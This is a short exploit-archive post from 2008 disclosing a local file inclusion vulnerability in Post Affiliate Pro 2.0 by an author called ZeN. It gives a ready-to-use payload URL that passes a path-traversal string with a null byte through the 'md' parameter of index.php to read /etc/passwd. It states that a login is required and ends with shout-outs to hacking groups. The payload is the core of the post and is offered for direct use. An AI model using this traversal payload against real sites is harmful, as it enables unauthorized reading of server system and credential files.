[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Post Affiliate Pro 2.0 (index.php md) Local File Inclusion Vulnerability
# Published : 2008-10-16
# Author : ZeN
# Previous Title : Calendars for the Web 4.02 Admin Auth Bypass Vulnerability
# Next Title : AstroSPACES (id) Remote SQL Injection Vulnerability
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Software : Post Affiliate Pro v2.0
Vulnrability : Local File Inclusion
Severity : High
Author : ZeN
Date : 16 October 2008
Websites >
http://DUSecurity.com
http://DarkCode.me
PS : You MUST be logged into the system for the exploit to work.
Exploit >
http://site.com/affiliates/index.php?md=../../../../../../../etc/passwd%00
Shouts>
DUSecurity Group
DarkCode
WL-Group
IWannaHack
Milw0rm
EnigmaGroup
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# www.Syue.com [2008-10-16]